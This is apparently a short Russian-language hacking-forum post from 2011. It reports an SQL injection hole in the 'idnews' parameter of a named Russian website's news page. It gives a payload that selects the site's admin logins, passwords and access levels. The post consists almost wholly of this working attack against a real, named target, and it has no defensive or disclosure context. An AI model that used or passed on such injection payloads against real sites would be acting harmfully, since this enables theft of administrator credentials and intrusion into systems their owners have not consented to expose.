02.10.2011, 15:35
|
|
Познающий
Регистрация: 18.11.2009
Сообщений: 30
С нами:
8673282
Репутация:
17
|
|
Уязвимость существует в get запросе http://www.bryansktel.ru/news/?idnews=121 из-за недостаточной фильтрации переменной idnews.
select+concat(login,0x3a,password,0x3a,level)+from +admins+limit+0,1
|
|
|